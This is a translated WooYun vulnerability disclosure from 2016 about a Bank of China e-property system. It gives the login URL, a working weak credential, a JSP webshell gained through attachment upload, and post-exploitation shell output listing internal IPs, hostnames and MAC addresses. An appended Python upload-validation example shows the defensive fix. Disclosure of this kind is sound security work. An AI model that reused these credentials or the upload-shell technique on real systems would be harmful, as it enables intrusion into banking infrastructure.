Vulnerability summary

Defect ID: wooyun-2016-0204059

Title: A Bank of China system has a weak password that allows a SHELL to be uploaded (penetrating the perimeter firewall into the intranet)

Vendor: Bank of China

Author: 猪猪侠

Submitted: 2016-05-01 14:44

Fixed: 2016-06-18 21:00

Published: 2016-06-18 21:00

Vulnerability type: Unauthorized access / privilege bypass

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-05-01: Details sent to the vendor; awaiting vendor handling
2016-05-04: Vendor confirmed; details disclosed to the vendor only
2016-05-14: Details disclosed to core white hats and experts in the relevant field
2016-05-24: Details disclosed to regular white hats
2016-06-03: Details disclosed to intern white hats
2016-06-18: Details disclosed to the public

Brief description:

A Bank of China system has a weak password that allows a SHELL to be uploaded (penetrating the perimeter firewall into the intranet)

Detailed description:

#1 How it was found
Using a generic weak-password detection script: simple, efficient, and enormously effective.
http://zone.wooyun.org/content/22529
http://zone.wooyun.org/content/21962
Top 500 Chinese names (statistics from the national population database)
http://zone.wooyun.org/content/18372
#2 Vulnerability description
https://e.boc.cn/ehome/property/frame/sign.do
One weak credential found: wangwei:000000
In the community-management function, adding an attachment is enough to obtain a shell.

[Image: fujian.png]


Proof of vulnerability:

https://e.boc.cn/ehome/eshop/ehome-files/eproperty/2016/05/01/Customize14*********.jsp

[Image: webshell.jpg]


[/]$ /sbin/ifconfig -a
eth0 Link encap:Ethernet HWaddr 00:50:56:9A:72:2C
inet addr:21.123.47.151 Bcast:21.123.47.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:127879201 errors:0 dropped:0 overruns:0 frame:0
TX packets:117334178 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:22666975632 (21.1 GiB) TX bytes:32615347620 (30.3 GiB)
eth1 Link encap:Ethernet HWaddr 00:50:56:9A:14:C4
inet addr:10.123.47.151 Bcast:10.123.47.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:51273711 errors:0 dropped:0 overruns:0 frame:0
TX packets:46856648 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:12233542012 (11.3 GiB) TX bytes:9912431273 (9.2 GiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:238664440 errors:0 dropped:0 overruns:0 frame:0
TX packets:238664440 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:24040429146 (22.3 GiB) TX bytes:24040429146 (22.3 GiB)
[/]$ cat /etc/hosts
127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
21.123.47.146 P1EZECAP01
21.123.47.147 P1EZECAP02
21.123.47.148 P1EZECAP03
21.123.47.149 P1EZECAP04
21.123.47.150 P1EZECAP05
21.123.47.151 P1EZECAP06
21.123.47.152 P1EZECAP07
21.123.47.153 P1EZECAP08
10.123.47.146 P1EZECAP01_gpfs
10.123.47.147 P1EZECAP02_gpfs
10.123.47.148 P1EZECAP03_gpfs
10.123.47.149 P1EZECAP04_gpfs
10.123.47.150 P1EZECAP05_gpfs
10.123.47.151 P1EZECAP06_gpfs
10.123.47.152 P1EZECAP07_gpfs
10.123.47.153 P1EZECAP08_gpfs
21.122.32.116 ZabbixServer
21.123.102.88 nbu3media1
21.123.102.89 nbu3media2
21.123.102.90 nbu3master
[/]$ /sbin/arp -a
? (21.123.47.161) at 00:50:56:9a:3d:95 [ether] on eth0
P1EZECAP05 (21.123.47.150) at 00:50:56:9a:00:55 [ether] on eth0
? (21.123.47.1) at 00:00:0c:9f:f0:2f [ether] on eth0
P1EZECAP01_gpfs (10.123.47.146) at 00:50:56:9a:62:66 [ether] on eth1
P1EZECAP05_gpfs (10.123.47.150) at 00:50:56:9a:79:c7 [ether] on eth1
P1EZECAP03_gpfs (10.123.47.148) at 00:50:56:9a:31:0c [ether] on eth1
P1EZECAP04_gpfs (10.123.47.149) at 00:50:56:9a:6f:8f [ether] on eth1
P1EZECAP07 (21.123.47.152) at 00:50:56:9a:49:62 [ether] on eth0
P1EZECAP08_gpfs (10.123.47.153) at 00:50:56:9a:7b:08 [ether] on eth1
P1EZECAP07_gpfs (10.123.47.152) at 00:50:56:9a:05:f1 [ether] on eth1
P1EZECAP02_gpfs (10.123.47.147) at 00:50:56:9a:56:89 [ether] on eth1
[/]$

Remediation:

Fix the weak password and fix the upload vulnerability.

Copyright notice: when reposting, please credit the source 猪猪侠@乌云
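On the upload side, the root cause is that a client-named attachment ending in .jsp was written into a directory the servlet container serves and executes (the ehome-files path shown in the proof). The following is an added example, not code from the report or from the affected system, of how an attachment handler can refuse that: an allowlist of attachment types, the extension checked on every dotted segment of the name, a magic-byte check against the declared type, and a server-chosen file name under a hypothetical storage root that sits outside the web root (the allowed types and STORAGE_ROOT are assumptions for the example).

```python
import os
import secrets
from pathlib import PurePosixPath

# Constructed policy for this example: the attachment types the feature
# actually needs, with the leading bytes each one must start with.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "pdf": b"%PDF-",
}
# Extensions a JSP/servlet container would execute if they landed under
# a served directory, as happened in the report.
EXECUTABLE_EXTS = {"jsp", "jspx", "jspf", "jsw", "jsv", "war", "jar", "class"}
# Hypothetical storage root that is NOT under the web root.
STORAGE_ROOT = "/var/lib/eproperty/attachments"


def classify_attachment(filename: str, head: bytes) -> str:
    """Return the allowed type key for an upload, or raise ValueError."""
    name = PurePosixPath(filename.replace("\\", "/")).name  # drop any path part
    if "\x00" in name or name in ("", ".", ".."):
        raise ValueError("invalid file name")
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        raise ValueError("missing base name or extension")
    # Every segment after the base name is checked, so both shell.jsp.png
    # and shell.png.jsp are refused regardless of how the server maps them.
    for ext in parts[1:]:
        if ext in EXECUTABLE_EXTS:
            raise ValueError("executable extension refused: " + ext)
    ext = "jpg" if parts[-1] == "jpeg" else parts[-1]
    magic = ALLOWED_TYPES.get(ext)
    if magic is None:
        raise ValueError("extension not allowed: " + ext)
    if not head.startswith(magic):
        raise ValueError("content does not match declared type")
    return ext


def is_accepted(filename: str, head: bytes) -> bool:
    """Boolean wrapper around classify_attachment for simple checks."""
    try:
        classify_attachment(filename, head)
        return True
    except ValueError:
        return False


def storage_path(filename: str, head: bytes) -> str:
    """Validate the upload and return a server-chosen path outside the web root."""
    ext = classify_attachment(filename, head)
    # The client-supplied name never reaches the filesystem.
    return os.path.join(STORAGE_ROOT, secrets.token_hex(16) + "." + ext)
```

The stored path is returned to the application for serving through a download handler that sets Content-Disposition and a fixed Content-Type, rather than by exposing the directory itself.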


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2016-05-04 20:50

Vendor reply:

Thanks to the white hat

Latest status:

None yet